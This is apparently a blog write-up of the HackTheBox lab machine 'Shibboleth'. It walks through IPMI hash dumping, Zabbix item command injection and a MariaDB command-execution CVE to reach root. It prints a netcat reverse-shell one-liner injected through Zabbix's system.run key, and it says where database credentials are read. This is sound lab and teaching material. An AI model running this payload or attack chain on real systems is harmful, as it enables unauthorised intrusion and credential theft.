HackTheBox-Shibboleth

Hello everyone, in this post I will be sharing my writeup for HTB-Shibboleth which was medium difficulty linux box, starting with nmap scan the only port that was open was port 80 on which apache was running and few UDP ports. Checking the web server it was having a template and there wasn’t any interesting there, enumerating for subdomain monitor.shibboleth.htb on which zabbix was hosted, futher scanning for UDP ports revealed that port 623 was open thourgh which we were able to dump IPMI hash which gave access to zabbix as an administrator. Being in the zabbix dashboard we were able to get a reverse shell by injection commands in item values through zabbix agent. After getting a shell we were able to escalate our privileges by password re use (using the zabbix admin password ) on ipmi-svc which had permissons to read zabbix database password, logging into mariadb we can see the version number which was vulnerable to CVE-2021–27928 a command execution vulnerability giving as a reverse shell as root user.

NMAP

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

PORT 80 (HTTP)

On the web server we see a html template page

We can check the source which reveals that it’s a theme so no point in enumerating here, from the nmap scan it did show us that it was redirecting to a domain name so let’s try to run wfuzz to bruteforce for subdomains

Here it gives us there names, and these all are the same

If we hover over the help link , it will show us that it's using version 5 of zabbix , which is a tool for monitoring the network and ,virtual machines and other services running. Searching for exploits was a rabbit hole here as it was reported that zabbix 5.x is vulnerable to blind sqli but there wasn't any exploits publicily available.

I went back to scanning the machine and scanend for UDP ports

nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv                                                                           
PORT    STATE  SERVICE   REASON                      
45/udp  closed mpm       port-unreach ttl 63                     
179/udp closed bgp       port-unreach ttl 63                     
243/udp closed sur-meas  port-unreach ttl 63
422/udp closed ariel3    port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open   asf-rmcp  udp-response ttl 63
892/udp closed unknown   port-unreach ttl 63

This showed port 623 which was opened and was running IPMI Intelligent Platform Management Interface , which is used for controlling and managing hardware services. There was a metasploit module available that can dump HMAC-SHA1 hashes, so using the module use auxiliary/scanner/ipmi/ipmi_dumphashes

And we can now crack this hash using hashcat

Foothold

To get a foolthold , we can run shell commands through Zabbix agent, in order to do this first we’ll need to go to Configuration and select Hosts

Next select the hostname ,which is shibboleth.htb , after selecting the hostname , navigate to items

Click on create new item

When adding a new item , in the key field to run command we need to input system.run["shell command"] also change type of information to text

At the bottom , we can see a button Test to check our command

So we have command execution here , now we need to get a reverse shell from here

system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]

We are specifying nowait here so it does not close the process

Stabilizing the reverse shell so we may have a tty shell

Privilege Escalation (ipmi-svc)

I ran sudo -l to see if there was any thing this user can run as a different user or as root but we need a password , I tried the zabbix admin password but it failed

We can see another user named ipmi-svc , let's try the password that we found for this user

And this worked , we can find the database creds from /etc/zabbix/zabbix_server.conf

## Privilege Escalation (root)

After logging in with mysql , it was using Mariadb which was using 10.3.25 version, so I searched for if there was any exploit for this version and it returned with a command execution exploit

So first we have to generate a shared library file which can be used in any program at run time , transfer that on the target machine

Start the netcat listener , and login in with mysql user and executing the shared library

References

• https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/
• https://hashcat.net/wiki/doku.php?id=example_hashes
• https://subscription.packtpub.com/book/cloud-and-networking/9781800202238/2/ch02lvl1sec20/using-zabbix-preprocessing-to-alter-item-values
• https://www.zabbix.com/forum/zabbix-help/21803-system-run-syntax
• https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html